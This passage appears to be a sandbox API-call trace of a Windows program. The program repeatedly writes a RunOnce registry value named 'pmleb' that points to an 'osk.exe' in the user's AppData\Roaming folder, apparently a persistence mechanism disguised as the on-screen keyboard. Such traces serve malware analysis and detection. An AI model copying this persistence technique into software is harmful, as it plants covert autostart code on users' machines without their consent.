[0103.506] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.506] RegCloseKey (hKey=0x280) returned 0x0 [0103.506] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.506] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.506] SetTimer (hWnd=0x20280, nIDEvent=0x23cf, uElapse=0xa, lpTimerFunc=0x0) returned 0x23cf [0103.506] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.512] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.512] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.512] KillTimer (hWnd=0x20280, uIDEvent=0x23cf) returned 1 [0103.512] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.513] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.513] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.513] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.513] RegCloseKey (hKey=0x280) returned 0x0 [0103.513] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.513] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.513] SetTimer (hWnd=0x20280, nIDEvent=0x23d0, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d0 [0103.513] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.527] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.527] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.527] KillTimer (hWnd=0x20280, uIDEvent=0x23d0) returned 1 [0103.527] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.528] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.528] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.528] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.528] RegCloseKey (hKey=0x280) returned 0x0 [0103.528] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.528] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.528] SetTimer (hWnd=0x20280, nIDEvent=0x23d1, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d1 [0103.529] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.543] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.543] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.543] KillTimer (hWnd=0x20280, uIDEvent=0x23d1) returned 1 [0103.543] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.543] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.544] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.544] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.544] RegCloseKey (hKey=0x280) returned 0x0 [0103.544] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.544] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.544] SetTimer (hWnd=0x20280, nIDEvent=0x23d2, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d2 [0103.544] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.558] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.558] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.558] KillTimer (hWnd=0x20280, uIDEvent=0x23d2) returned 1 [0103.559] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.559] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.559] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.559] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.560] RegCloseKey (hKey=0x280) returned 0x0 [0103.560] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.560] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.560] SetTimer (hWnd=0x20280, nIDEvent=0x23d3, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d3 [0103.560] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.574] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.574] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.574] KillTimer (hWnd=0x20280, uIDEvent=0x23d3) returned 1 [0103.574] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.575] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.575] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.575] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.575] RegCloseKey (hKey=0x280) returned 0x0 [0103.576] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.576] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.576] SetTimer (hWnd=0x20280, nIDEvent=0x23d4, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d4 [0103.576] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.589] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.589] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.590] KillTimer (hWnd=0x20280, uIDEvent=0x23d4) returned 1 [0103.590] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.590] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.591] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.591] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.591] RegCloseKey (hKey=0x280) returned 0x0 [0103.591] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.591] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.591] SetTimer (hWnd=0x20280, nIDEvent=0x23d5, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d5 [0103.591] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.606] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.606] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.606] KillTimer (hWnd=0x20280, uIDEvent=0x23d5) returned 1 [0103.606] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.607] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.607] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.607] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.607] RegCloseKey (hKey=0x280) returned 0x0 [0103.607] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.608] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.608] SetTimer (hWnd=0x20280, nIDEvent=0x23d6, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d6 [0103.608] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.621] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.621] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.621] KillTimer (hWnd=0x20280, uIDEvent=0x23d6) returned 1 [0103.621] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.621] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.621] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.622] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.622] RegCloseKey (hKey=0x280) returned 0x0 [0103.622] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.622] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.622] SetTimer (hWnd=0x20280, nIDEvent=0x23d7, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d7 [0103.622] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.637] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.637] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.637] KillTimer (hWnd=0x20280, uIDEvent=0x23d7) returned 1 [0103.637] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.638] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.638] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.638] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.638] RegCloseKey (hKey=0x280) returned 0x0 [0103.638] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.638] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.638] SetTimer (hWnd=0x20280, nIDEvent=0x23d8, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d8 [0103.638] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.652] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.652] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.652] KillTimer (hWnd=0x20280, uIDEvent=0x23d8) returned 1 [0103.652] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.652] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.652] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.653] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.653] RegCloseKey (hKey=0x280) returned 0x0 [0103.653] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.653] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.653] SetTimer (hWnd=0x20280, nIDEvent=0x23d9, uElapse=0xa, lpTimerFunc=0x0) returned 0x23d9 [0103.653] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.667] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.667] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.668] KillTimer (hWnd=0x20280, uIDEvent=0x23d9) returned 1 [0103.668] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.668] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.668] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.669] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.669] RegCloseKey (hKey=0x280) returned 0x0 [0103.669] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.669] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.669] SetTimer (hWnd=0x20280, nIDEvent=0x23da, uElapse=0xa, lpTimerFunc=0x0) returned 0x23da [0103.669] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.683] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.683] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.683] KillTimer (hWnd=0x20280, uIDEvent=0x23da) returned 1 [0103.683] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.684] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.684] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.684] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.684] RegCloseKey (hKey=0x280) returned 0x0 [0103.684] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.684] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.684] SetTimer (hWnd=0x20280, nIDEvent=0x23db, uElapse=0xa, lpTimerFunc=0x0) returned 0x23db [0103.684] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.699] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.699] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.699] KillTimer (hWnd=0x20280, uIDEvent=0x23db) returned 1 [0103.699] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.700] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.700] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.700] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.700] RegCloseKey (hKey=0x280) returned 0x0 [0103.700] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.700] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.700] SetTimer (hWnd=0x20280, nIDEvent=0x23dc, uElapse=0xa, lpTimerFunc=0x0) returned 0x23dc [0103.701] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.715] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.715] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.715] KillTimer (hWnd=0x20280, uIDEvent=0x23dc) returned 1 [0103.716] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.717] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.717] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.717] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.717] RegCloseKey (hKey=0x280) returned 0x0 [0103.717] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.717] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.717] SetTimer (hWnd=0x20280, nIDEvent=0x23dd, uElapse=0xa, lpTimerFunc=0x0) returned 0x23dd [0103.717] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.732] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.732] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.732] KillTimer (hWnd=0x20280, uIDEvent=0x23dd) returned 1 [0103.733] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.733] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.733] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.733] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.734] RegCloseKey (hKey=0x280) returned 0x0 [0103.734] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.734] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.734] SetTimer (hWnd=0x20280, nIDEvent=0x23de, uElapse=0xa, lpTimerFunc=0x0) returned 0x23de [0103.734] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.847] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.847] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.847] KillTimer (hWnd=0x20280, uIDEvent=0x23de) returned 1 [0103.848] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.848] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.848] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.848] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.849] RegCloseKey (hKey=0x280) returned 0x0 [0103.849] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.849] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.849] SetTimer (hWnd=0x20280, nIDEvent=0x23df, uElapse=0xa, lpTimerFunc=0x0) returned 0x23df [0103.849] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.855] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.855] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.855] KillTimer (hWnd=0x20280, uIDEvent=0x23df) returned 1 [0103.855] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.855] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.856] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.856] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.856] RegCloseKey (hKey=0x280) returned 0x0 [0103.856] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.856] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.856] SetTimer (hWnd=0x20280, nIDEvent=0x23e0, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e0 [0103.856] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.870] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.870] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.871] KillTimer (hWnd=0x20280, uIDEvent=0x23e0) returned 1 [0103.871] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.871] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.871] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.871] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.872] RegCloseKey (hKey=0x280) returned 0x0 [0103.872] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.872] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.872] SetTimer (hWnd=0x20280, nIDEvent=0x23e1, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e1 [0103.872] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 